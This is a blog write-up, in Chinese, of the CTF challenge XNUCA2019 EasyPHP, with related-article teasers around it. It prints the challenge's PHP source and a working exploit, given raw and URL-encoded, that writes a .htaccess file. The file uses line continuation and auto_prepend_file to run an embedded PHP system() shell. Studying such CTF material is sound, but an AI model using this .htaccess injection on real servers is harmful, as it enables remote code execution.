[XNUCA2019Qualifier]EasyPHP

最新推荐文章于 2024-10-30 21:56:10 发布
最新推荐文章于 2024-10-30 21:56:10 发布
阅读量507 收藏
点赞数
分类专栏: BUUCTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/129338836
版权 
知识点: .htaccess 利用

代码主要有两个过滤:

一个是文件名:以 a-z 以及 . 开头,这里就很巧妙了,什么文件以点开头,配置文件啊。
另一个就是对文件内容的过滤,基本等于没有,可以用注释和行拼接绕过。

php 的 .htaccess 文件中可以用 # 号注释某行,也可以用 \ 拼接上下两行,那么我们可以直接在 .htaccess 里写 shell,加上 auto_prepend_file 设置把 shell 包含到 index.php 中。

<?php
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    include_once("fl3g.php");
    if(!isset($_GET['content']) || !isset($_GET['filename'])) {
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET['content'];
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
        echo "Hacker";
        die();
    }
    $filename = $_GET['filename'];
    if(preg_match("/[^a-z\.]/", $filename) == 1) {
        echo "Hacker";
        die();
    }
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    file_put_contents($filename, $content . "\nJust one chance");
?>

payload: 当然要对代码 url 编码一下

?content=php_value auto_prepend_fi\
le .htaccess
#<?php system('cat /fl*');?>\&filename=.htaccess

?content=php_value%20auto_prepend_fi%5C%0Ale%20.htaccess%0A%23%3C%3Fphp%20system('cat%20%2Ffl*')%3B%3F%3E%5C&filename=.htaccess

.htaccess 的各种利用 y4 师傅的文章就写的很详细,其中还有很多解决这道题的方法,这边就不一一列举了。

https://blog.csdn.net/solitudi/article/details/116666720

succ3
关注
专栏目录
BUUCTF:[XNUCA2019Qualifier]EasyPHP -- 关于.htaccess 的各种配置操作,
Zero_Adam的博客
04-16 1491
目录:一、自己做:二、学到的&&不足:1. python 上传.htaccess时的\\问题2. 关于.htaccess解析错误时3. python 上传 .htaccess时,注释符# 的问题!在字符串中进行传输# 也会当作注释符!!三、学习WP:1. 非预期:2. 预期解2:3. 预期解: 参考的文章,看最下面的那两篇就是了 总体: 这些方法看起来很棒,其实我感觉这都是参赛者当时 细心看PHP文档才发现的,而我辈现在直接看他们的现成的东西,如此巧妙的方法之下,是大佬们细心找到的bug点,
[XNUCA2019Qualifier]EasyPHP之.htaccess的利用。
snowlyzz的博客
08-30 471
.htaccess 的配置文件设置
buu刷题(4)
qq_62046696的博客
03-22 581
题目中只限制了 F I L E S [ f i l e ] ∗ ∗ 的上传后缀,也只给出 ∗ ∗ _FILES[file]** 的上传后缀,也只给出 ** FILES[file]∗∗的上传后缀,也只给出∗∗_FILES[file] 上传后的路径,那我们上传多文件就可以绕过。人傻了,上面的思路全部错掉,上面输入的filename文件,其实是没有权限执行php代码的,这点我们可以通过phpinfo();所以我们的恶意代码先执行。也是通过报错推断出过滤了{{而没用过滤{,这里我用的是{%3*3%}发现回显的是,
ByteCTF_2019&XNUCA_2019部分web题复现
Lethe's Blog
09-11 4838
EzCMS 1、扫描目录有www.zip,下载得到源码。 整个题目的功能如下: index.php页面验证登陆,可以任意账号登陆到upload.php上传页面,但是只有admin账号才能进行文件上传。 访问了upload.php·,就会在沙盒下生成一个.htaccess文件,内容为:lolololol, i control all。 上传文件后,会返回文件的存储路径,view details可以...
HashCode_2019_Qualifier:以后再做
03-31
【HashCode_2019_Qualifier:以后再做】是一个与编程竞赛相关的项目,可能是指Google组织的年度编程挑战赛HashCode。这个项目的标签为"Python",意味着它主要使用Python语言来解决竞赛中的问题。从提供的信息来看,...
Spring @Primary和@Qualifier注解原理解析
08-19
"Spring @Primary和@Qualifier注解原理解析" 在Spring框架中,@Primary和@Qualifier注解是两个非常重要的注解,它们的主要作用是消除bean注入时的歧义,能够让Spring容器知道加载哪个bean。本文将通过示例代码详细...
如何正确使用 @Qualifier 注解来解决多个同类型 Bean 注入的问题
07-17
使用 @Qualifier 注解是解决 Spring 中多个同类型 Bean 注入冲突的一种常见方法。当我们在 Spring 容器中存在多个同一接口或父类的实现时,如果不明确指定要注入哪个实现,Spring 就会抛出 "Consider marking one of...
Spring实战之Qualifier注解用法示例
08-25
Spring实战之Qualifier注解用法示例 Qualifier注解是Spring Framework中的一种依赖注入方式,用于在多个同类型的Bean中选择特定的Bean实例。下面是Qualifier注解的详细用法示例: 一、 配置文件 在Spring配置文件...
BUU CTF web(四)
0xdawn的博客
05-11 5511
[HarekazeCTF2019]encode_and_encode <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob
.htaccess 的利用实践
qq_53755216的博客
06-28 284
简介 最近做文件上传题目时遇到了利用.htaccess文件进行rce的题目 正好今天刷freebuff时 又看到了一篇文章 这里就认真总结一下 发现一个好玩的现象 freebuff搜索 .htaccess 的时候返回404 算是给过滤了?hh 常规利用方式 way1 我在本地开了个环境试了一下 .htaccess 写入 AddType application/x-httpd-php .txt 当访问1.txt时 就可以将1.txt当成php文件来执行 way2 将 .htaccess文件自身当成php
BUUCTF刷题记录(6)
bmth666的博客
05-14 7664
文章目录web[FBCTF2019]RCEService web 打ctf(×) 被ctf打(√) [FBCTF2019]RCEService 首先查看文件夹文件,{"cmd":"ls"} 然后输入其他的发现被ban了,看wp得源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { ...
BUUCTF web writeup
热门推荐
stepone4ward的博客
09-11 2万+
buuctf题目的部分writeup,持续更新中
BUUCTF:[ISITDTU 2019]EasyPHP --- rce 超级异或,,,吐了,,,字符之间异或, 成型的异或payload!!!
Zero_Adam的博客
04-06 1725
目录:一、自己做:二、学的的三、学习WP1. 这里先来个不限制字符个数的关于这个%ff 以及异或的事情,咱们好好唠唠1.生成异或中间值的python脚本2. 看有字符限制的时候,:!!干了,,发现了一个更好多python脚本,,接着做题~。 一、自己做: <?php highlight_file(__FILE__); $_ = @$_GET['_']; if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) ) di
UNCTF2020web方向部分题解
bmth666的博客
11-18 1714
文章目录Web方向easy_ssrfeasyflask俄罗斯方块人大战奥特曼easyunserializebabyevalezphpeasy_uploadUN's_online_toolsezfind其他的题目的一些思路:checkin-sql:easyphp: Web方向 easy_ssrf php遇到不认识的协议就会当目录处理 ?url=0://unctf.com/../../../../../../../../flag easyflask SSTI/沙盒逃逸详细总结 SSTI模板注入及绕过姿势(基
文件上传漏洞-通过.htaccess文件绕过
m0_73902453的博客
10-30 308
3.先将.htaccess上传上去,然后再打开抓包上传木马文件(1.php),然后将名字修改成1.jpg,因为刚刚的.htaccess已经上传到服务器,告诉服务器.jpg文件可以当作.php文件执行。通过这个文件,网站管理员可以进行各种配置,例如重定向、访问控制、URL重写等。结尾的文件都当作 PHP 脚本来处理,而不是作为普通文本文件或图像文件。这意味着,即使它们有文本或影像文件的扩展名,服务器将尝试执行其中的 PHP代码。2.这里以upload-labs(less-4)为例,我们先来看看靶场的源代码。
PHP文件包含漏洞
佛系摆烂
10-29 573
PHP 文件包含漏洞(File Inclusion Vulnerability)是一种常见的 Web 安全漏洞,发生在用户对 PHP 文件包含函数(如 include、require、include_once、require_once)的输入缺乏过滤和验证时。攻击者可以利用这个漏洞来包含服务器上任意文件,甚至是远程文件(如果服务器允许),从而获取敏感信息或执行任意代码。
Unsafe Fileupload-pikachu
zhangqqa的博客
10-30 990
不安全的文件上传漏洞概述文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上传一些恶意的文件,比如一句话木马,从而导致后台服务器被webshell。所以,在设计文件上传功能时,一定要对传进来的文件进行严格的安全考虑。
warmup
最新发布
W286734的博客
10-30 374
查看源代码发现,source.php。访问source.php,显而易见,php代码审计。$pos。
@Qualifier
08-26
@Qualifier 是一个Spring框架中的注解,用于解决依赖注入时的歧义性问题。在一个类中存在多个实现相同接口或父类的注入对象时,可以使用 @Qualifier 注解标注具体的实现类,告诉 Spring 框架要注入哪个实例。 通过 @Qualifier 注解,我们可以在多个候选对象中选择一个具体的实例进行注入。它常与@Autowired 注解一起使用,以便在注入时指定具体的实现类。 例如: ```java public interface Animal { void eat(); } @Component @Qualifier("cat") public class Cat implements Animal { @Override public void eat() { System.out.println("Cat is eating."); } } @Component @Qualifier("dog") public class Dog implements Animal { @Override public void eat() { System.out.println("Dog is eating."); } } @Component public class Person { private final Animal animal; public Person(@Qualifier("cat") Animal animal) { this.animal = animal; } public void feedAnimal() { animal.eat(); } } ``` 在上述示例中,Animal 接口有两个实现类 Cat 和 Dog,通过 @Qualifier 注解标注它们的实例。在 Person 类中通过构造函数注入 Animal 实例,并使用 @Qualifier("cat") 指定了要注入的实现类为 Cat。这样,在调用 feedAnimal 方法时,会输出 "Cat is eating."。 这就是 @Qualifier 注解的基本使用方法,它可以帮助我们在多个实现类中选择合适的对象进行注入。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值